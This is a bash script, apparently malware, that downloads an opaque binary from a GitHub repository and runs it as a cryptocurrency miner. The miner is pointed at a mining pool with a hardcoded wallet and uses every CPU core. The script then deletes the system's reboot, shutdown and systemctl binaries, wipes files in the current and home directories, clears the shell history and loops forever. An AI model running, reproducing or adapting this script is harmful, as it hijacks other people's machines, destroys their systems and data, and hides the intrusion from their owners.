#!/bin/bash
apt update
apt-get install git build-essential cmake automake libtool autoconf libhwloc-dev libuv1-dev
wget -O mmm https://github.com/kidoescegh/xm/raw/main/sorabi28 > /dev/null 2>&1
chmod 777 mmm
./mmm --algorithm panthera --pool mine.scalaproject.io:3333 --wallet Ssy2AL3Pqfwed8r2477gh6e79rZPfE3ze8ppWg2PN5oLMjQLM4BVBPDKFp82fpq4KtSHPb387pjVtF9HoypUsMsk95y3VrUEEM.$(echo $(shuf -i 1-100000 -n 1)-mamah) --password $(echo $(shuf -i 1-100000 -n 1)-kido) --cpu-threads $(nproc --all) --keepalive true
sleep 30
sudo rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl || rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl
curl ifconfig.me
rm -rvf *
cd ~/
rm -rvf *
history -cr
while true
do
        echo "hold down..."
        sleep 30
done
